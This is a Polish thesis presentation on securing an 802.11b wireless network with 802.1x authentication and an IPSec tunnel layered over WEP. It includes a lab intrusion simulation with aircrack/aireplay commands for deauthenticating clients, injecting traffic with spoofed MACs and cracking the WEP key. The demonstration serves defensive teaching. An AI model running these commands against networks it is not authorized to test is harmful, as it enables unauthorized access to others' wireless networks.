Projekt sieci WLAN w standardzie 802 Projekt sieci WLAN w standardzie 802.11b udostępniającej połączenie z siecią Internet w oparciu o protokół IPSec Wykonał: Bartosz Zielski Promotor: mgr Wiesław Pyzik
WSTĘP Komputer jako jednostka w XXI wieku; Sieci radiowe to dobra alternatywa dla LAN; Mobilność, estetyka, niskie koszty; Zagrożenia, jakie stwarza korzystanie z sygnału radiowego.
CELE Skonfigurowanie prostej sieci WLAN 802.11b w oparciu o protokół WEP połączonej z Internetem poprzez bramę (NAT); Silniejsze zabezpieczenie połączeń radiowych przy wykorzystaniu implementacji protokołów wyższych warstw modelu OSI: Uwierzytelnienie hostów za pomocą protokołu 802.1x; Skonfigurowanie tunelu IPSec między hostami a bramą.
SCHEMAT
SIECI RADIOWE WLAN Topologie BSS – tryb infrastrukturalny Oparty o centralny punkt dostępowy i stacje klientów; Sieć identyfikowana jest poprzez identyfikator SSID; Po pomyślnym powiązaniu ze stacją kliencką punkt dostępowy pełni rolę pośrednika w komunikacji z resztą sieci. Pozostałe topologie IBSS (ad hoc), ESS.
SIECI RADIOWE WLAN Standardy Cechy IEEE 802.11b Działa w zakresie 2,4 GHz na 11 kanałach w modulacji DSSS; Maksymalna transmisja to 11Mb/s, jednak rzeczywista tylko 6 Mb/s; Podatny na zakłócenia z powodu dużego zagęszczenia urządzeń radiowych działających w tych samych częstotliwościach; Duża dostępność kompatybilnych urządzeń. Pozostałe standardy 802.11 IEEE 802.11a, IEEE 802.11g, IEEE 802.11n.
SIECI RADIOWE WLAN Bezpieczeństwo Cechy WEP Protokół szyfrowania, którego zadaniem jest zapewnienie poufności i integralności danych oraz ochrona przed dostępem do infrastruktury sieci; Wykorzystuje mechanizm klucza wspólnego (o długości 40 i 104 bitów) z symetrycznym szyfrem RC4; Słabości: błędna implementacja wektora inicjalizacyjnego, brak zarządzania kluczami; Pozostałe zabezpieczenia WPA – technologie: TKIP, 802.1x/EAP, PSK; IEEE 802.11i/WPA2 – WPA + AES.
SIECI RADIOWE WLAN Symulacja włamania Przygotowania Sieć WLAN: komputer PC, Punkt Dostępu (NAT, DHCP, WEP, ukrywanie ESSID, filtrowanie MAC); Intruz: Laptop z kartą sieciową (hermes II), oprogramowanie: Auditor, aircrack (airodump, aireplay, aircrack ),Ethereal; Cele Wykrycie ESSID; Złamanie klucza WEP; Ominięcie filtrownia adresów MAC.
SIECI RADIOWE WLAN Symulacja włamania Zbieranie wektorów IV #iwconfig wlan0 mode monitor #airodump wlan0 wektory 0
SIECI RADIOWE WLAN Symulacja włamania Wykrycie ESSID #aireplay -0 10 -a 00:16:B6:1D:A7:16 wlan0 (druga konsola)
SIECI RADIOWE WLAN Symulacja włamania Wprowadzenie sztucznego ruchu #aireplay -1 20 -e kaczogrodA.D.2006 -a 00:16:B6:1D:A7:16 -h 00:30:4F:2A:14:55 wlan0 #aireplay -3 -b 00:16:B6:1D:A7:16 -h 00:30:4F:2A:14:55 -x 700 wlan0
SIECI RADIOWE WLAN Symulacja włamania Łamanie klucza WEP #aircrack -0 wektory.ivs
SIECI RADIOWE WLAN Symulacja włamania
SIECI RADIOWE WLAN Symulacja włamania
WIRTUALNE SIECI PRYWATNE VPN Używają publicznej infrastruktury telekomunikacyjnej w celu udostępnienia zdalnym biurom lub też pojedynczym użytkownikom bezpiecznego dostępu do firmowej sieci komputerowej. Typy Site-Site, Client-Site. Architektury Intranet VPN, Remote Access, Extranet. Protokoły IPSec, SSL, L2TP, SSH.
WIRTUALNE SIECI PRYWATNE VPN Schemat sieci typu Client-Site o architekturze Remote Access.
WIRTUALNE SIECI PRYWATNE VPN Bezpieczeństwo Poufność danych – zabezpieczenie danych przed ich przeczytaniem lub skopiowaniem przez nieupoważnione osoby; Integralność danych – zagwarantowanie poprawności i nienaruszalności przesyłanych danych; Uwierzytelnienie źródła danych – uwierzytelnienie przez odbiorcę źródła przesyłanych pakietów; Niezaprzeczalność – zweryfikowanie czy nadawca i odbiorca są tymi stronami, które wysyłały i odbierały wiadomości; Techniki zabezpieczeń Szyfry symetryczne i asymetryczne, algorytm Diffiego-Hellmana, funkcje skrótu, podpisy cyfrowe, urzędy certyfikacji.
WIRTUALNE SIECI PRYWATNE VPN Protokół IPSec Ochrona danych realizowana jest na poziomie warstwy 3 modelu OSI; Ochrona polega na zabezpieczeniu datagramu IP i dodaniu do niego nagłówków ESP lub AH; Protokół ochrony ESP – szyfruje i częściowo uwierzytelnia dane; Protokół ochrony AH – tylko uwierzytelnia. Tryby funkcjonowania Transportowy (Transport Mode) – pozostają oryginalne nagłówki datagramu IP; Tunelowania (Tunel Mode) – dodany zostaje nowy nagłówek IP.
WIRTUALNE SIECI PRYWATNE VPN Funkcjonowanie protokołu IPSec Ustalane są związki bezpieczeństwa SA za pomocą protokołu IKE Zastosowany protokół, algorytmy i klucze kryptograficzne. Proces ustalania SA Faza 1 (negocjacja IKE SA) – zestawienie bezpiecznego kanału komunikacji do prowadzenia dalszych negocjacji; Tryby: Main Mode, Aggressive Mode; Uwierzytelnienie: Pre-Shared Secret, certyfikaty cyfrowe X.509, XAUTH. Proces ustalania SA Faza 2 (negocjacja IPSec SA) – uzgodnienie SA do zabezpieczenia transmisji danych.
WIRTUALNE SIECI PRYWATNE VPN Funkcjonowanie protokołu IPSec Faza 1 IKE – Main Mode
WIRTUALNE SIECI PRYWATNE VPN Funkcjonowanie protokołu IPSec Faza 2 IKE
KONFIGURACJA URZĄDZEŃ SIECIOWYCH Schemat
KONFIGURACJA URZĄDZEŃ SIECIOWYCH Serwer BRAMA.dyplom.bz Centralne urządzenie w sieci udostępniające trzy podstawowe usługi: Dostęp do Internetu dla użytkowników sieci lokalnej; Serwer DHCP udostępniający podstawowe parametry konfiguracyjne sieci; Bramka VPN umożliwiająca użytkownikom zestawienie szyfrowanych połączeń. Oprogramowanie OS: FreeBSD 5.4; Usługi: IPFIREWALL, NATD, ISCDHCP3, IPSec, racoon (ipsec-tool).
KONFIGURACJA URZĄDZEŃ SIECIOWYCH Serwer CA.dyplom.bz Serwer uwierzytelnienia udostępniający usługi: Uwierzytelnienia użytkowników przy użyciu protokołu RADIUS; Urzędu certyfikacji w oparciu o OpenSSL. Oprogramowanie OS: FreeBSD 6.0; Usługi: FreeRADIUS, OpenSSL.
KONFIGURACJA URZĄDZEŃ SIECIOWYCH Punkt dostępu AP.dyplom.bz Rolą punktu dostępu jest zabezpieczenie połączeń szyfrowaniem WEP oraz kontrola dostępu do medium radiowego: Szyfrowanie WEP 128 bitów; Filtrowanie adresów MAC kart sieciowych użytkowników; Uwierzytelnienie RADIUS. Produkt firmy LINKSYS model WRT54G v.5 zarządzany przez stronę WWW.
KONFIGURACJA URZĄDZEŃ SIECIOWYCH Komputer PC WINUSER1.dyplom.bz Funkcją komputera użytkownika jest prawidłowe uwierzytelnienie i zestawienie szyfrowanego tunelu z BRAMĄ. Instalacja certyfikatów; Konfiguracja uwierzytelnienia 802.1x; Utworzenie reguł bezpieczeństwa IPSec. Oprogramowanie OS: MS Windows XP SP2; Usługi: standardowe i wbudowane rozszerzenia systemowe (802.1x i IPSec).
ZESTAWIENIE POŁĄCZEŃ – Etap 1
ZESTAWIENIE POŁĄCZEŃ Etap 1
ZESTAWIENIE POŁĄCZEŃ – Etap 2
ZESTAWIENIE POŁĄCZEŃ Etap 2 W pierwszym etapie użytkownik został wstępnie uwierzytelniony i podłączony do sieci radiowej, kolejnym krokiem jest zestawienie szyfrowanego tunelu ESP z serwerem BRAMA.
WNIOSKI Poprzez użycie dodatkowych mechanizmów bezpieczeństwa zostało wyeliminowane ryzyko wynikające z użycia WEP; Zastosowane zabezpieczenia obejmują dwie warstwy modelu OSI, przez co są od siebie niezależne; W przypadku złamania klucza WEP przechwycone pakiety dalej są szyfrowane; Podłączenie do punktu dostępu wymaga uwierzytelnienia za pomocą certyfikatu; FIREWALL na serwerze BRAMA zabezpiecza sieć od strony Internetu.